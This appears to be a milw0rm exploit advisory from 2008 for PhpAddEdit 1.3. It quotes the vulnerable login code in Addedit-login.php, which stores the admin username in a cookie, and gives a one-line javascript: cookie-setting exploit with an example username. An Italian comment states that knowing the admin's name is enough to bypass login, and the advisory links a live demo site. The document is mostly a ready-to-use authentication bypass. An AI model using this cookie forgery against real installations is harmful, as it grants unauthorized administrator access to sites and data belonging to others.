-------------------------------------
PhpAddEdit 1.3 Login By Pass
-------------------------------------
Found By: x0r ( Evolution Team )
Email: andry2000@hotmail.it
-------------------------------------
Bug In: Addedit-login.php
if (!$login_error) {
// --- Set admin cookie so favorite form field will show up when I use
the site...
if ($_POST["rememberme"]) {
$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
} else {
setcookie("addedit", $_POST["adminuser"]);
}
Header("Location: ./");
}
}
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------
Exploit:
javascript:document.cookie = "addedit=[adminuser]; path=/";
es:
javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------
Greetz: Amore oggi +65 ti amo troppo.
# milw0rm.com [2008-12-11]